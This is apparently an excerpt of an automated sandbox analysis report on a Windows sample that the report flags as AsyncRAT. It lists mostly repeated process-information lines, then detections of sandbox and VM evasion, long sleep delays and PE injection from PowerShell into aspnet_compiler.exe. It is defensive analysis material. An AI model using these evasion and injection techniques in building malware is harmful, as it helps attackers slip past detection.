          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: aspnet_compiler.exe, 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\System32\mshta.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2688
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6527
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6447
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 6909
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 2765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 406
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe TID: 5568Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5488Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356Thread sleep count: 6447 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep count: 1046 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6532Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6532Thread sleep count: 34 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6540Thread sleep count: 6909 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6540Thread sleep count: 2765 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: aspnet_compiler.exe, 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpBinary or memory string: vmware
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
